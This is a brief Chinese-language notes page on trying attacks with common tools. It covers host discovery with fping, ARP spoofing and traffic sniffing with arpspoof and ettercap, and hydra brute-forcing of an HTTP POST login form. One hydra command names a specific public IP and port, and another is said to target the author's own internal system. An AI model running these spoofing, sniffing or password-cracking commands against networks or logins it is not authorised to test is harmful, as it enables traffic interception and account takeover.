想玩玩尝试一下
Arp攻击
查看目标ip
fping -asg 192.168.XXX.0/24
最后进行Arp
arpspoof -i 自身网卡 -t 目标ip 目标网关
问题
如果出现couldn't arp for host XXX,考虑虚拟机是否为桥接网络
ettercap工具
欺骗与嗅探
ettercap -Tq -i <自身网卡> -M arp:remote /<目标ip>//<目标网关>/
ettercap -Tq -i <自身网卡>
hydra
破解密码
命令 :hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV -f -s 38651 220.249.52.134 http-post-form "/check.php:username=^USER^&password=^PASS^:error"
-l确定一个用户名-P确定一个密码字典-s指定端口http-post-form采用表单post提交的方式URI:参数:错误返回
测试自己内部系统:hydra -l mintao -P /usr/share/wordlists/mydic.txt -vV -f 192.168.0.28 -s 16594 http-post-form "/suser/login:username=^USER^&password=^PASS^:?"
